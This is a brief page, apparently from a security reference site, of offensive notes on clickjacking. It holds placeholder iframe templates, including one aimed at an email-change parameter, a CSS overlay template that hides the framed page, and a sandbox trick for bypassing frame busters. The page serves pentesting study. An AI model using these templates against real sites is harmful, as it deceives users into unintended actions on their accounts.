LOGO
OFFENSIVE | DEFENSIVE | WIKI | ABOUT

[CLICKJACKING]



GENERAL INFORMATION NOTES: - The goal is to trick the user to make them to click on things that are not 100% real, i mean, it is some kind of decoy to make the user to do what you want. - Normally it is used with the iframe tag. - Check the code, URL attempts can be completed. - Validate the CSRF token. SAMPLE IFRAMES ::: GENERAL IFRAME TEST <iframe src="URL_TO_CLICKJACK"></iframe> You can add any URL that you can attack as source reference. ::: URL PARAMETERS <iframe src="URL_TO_CLICKJACK/[email protected]"></iframe> In here the parameter that we are using to attack is email, so, the parameter is defined. Inspection of the requests are needed. TEMPLATE STYLE <style> iframe { position:relative; width:_value; height: _value; opacity: _opacity; z-index: 2; } div { position:absolute; top:_value; left:_value; z-index: 1; } </style>
BYPASS PROTECTION :::> FRAME BUSTER Normally, the attribute sandbox="allow-forms" neutralize the frame buster. So a simple iframe tag can help to confirm if it is allowed or not. If the URL is reflected, it means it is not blocked. SAMPLE: <iframe sandbox="allow-forms" src="URL_TO_CLICKJACK/[email protected]"></iframe>

©® - Since 2023